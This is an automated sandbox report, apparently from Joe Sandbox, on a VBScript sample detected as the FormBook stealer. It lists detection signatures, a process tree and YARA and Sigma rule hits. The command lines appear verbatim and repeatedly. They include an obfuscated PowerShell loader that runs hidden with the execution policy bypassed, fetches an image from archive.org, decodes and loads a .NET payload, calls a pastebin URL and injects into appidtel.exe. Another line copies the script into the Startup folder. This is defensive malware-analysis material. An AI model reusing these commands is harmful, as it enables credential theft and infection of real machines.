Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Logistics1.vbs

Overview

General Information

Sample name:Logistics1.vbs
Analysis ID:1530595
MD5:932031ace12970e0b4ebbf866caebf8d
SHA1:83c48bf1a066adf5c8a32cb14187af5697778b5c
SHA256:5fd68faf4d253cd50d2598eba5fe49f80899ba8c0fc613763a790f6132ecf071
Tags:vbsuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7540 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7632 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7680 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • powershell.exe (PID: 7792 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 7892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • appidtel.exe (PID: 5484 cmdline: "C:\Windows\SysWOW64\appidtel.exe" MD5: 2C04FB942B2735073D75063E9FFBF50C)
        • appidtel.exe (PID: 7224 cmdline: "C:\Windows\SysWOW64\appidtel.exe" MD5: 2C04FB942B2735073D75063E9FFBF50C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000B.00000002.1841391892.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f553:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17692:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000B.00000002.1841927454.00000000032F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.1841927454.00000000032F0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bfc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x140ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      Process Memory Space: powershell.exe PID: 7892INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x3478b:$b2: ::FromBase64String(
      • 0x34c22:$b2: ::FromBase64String(
      • 0x36026:$b2: ::FromBase64String(
      • 0x36582:$b2: ::FromBase64String(
      • 0x36c06:$b2: ::FromBase64String(
      • 0x3711b:$b2: ::FromBase64String(
      • 0x5ef67:$b2: ::FromBase64String(
      • 0x1a31:$b3: ::UTF8.GetString(
      • 0x214e:$b3: ::UTF8.GetString(
      • 0x2dfb:$b3: ::UTF8.GetString(
      • 0x36bc:$b3: ::UTF8.GetString(
      • 0x4695:$b3: ::UTF8.GetString(
      • 0x4dab:$b3: ::UTF8.GetString(
      • 0x76e6:$b3: ::UTF8.GetString(
      • 0x22526:$b3: ::UTF8.GetString(
      • 0x22e7f:$b3: ::UTF8.GetString(
      • 0x27f04:$b3: ::UTF8.GetString(
      • 0x2861a:$b3: ::UTF8.GetString(
      • 0x2a0c9:$b3: ::UTF8.GetString(
      • 0x2a972:$b3: ::UTF8.GetString(
      • 0x2b4e5:$b3: ::UTF8.GetString(
      Click to see the 2 entries
      SourceRuleDescriptionAuthorStrings
      11.2.appidtel.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        11.2.appidtel.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2f553:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x17692:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        11.2.appidtel.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          11.2.appidtel.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e753:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16892:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          SourceRuleDescriptionAuthorStrings
          amsi64_8004.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5k
            Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgne
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgne
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgne
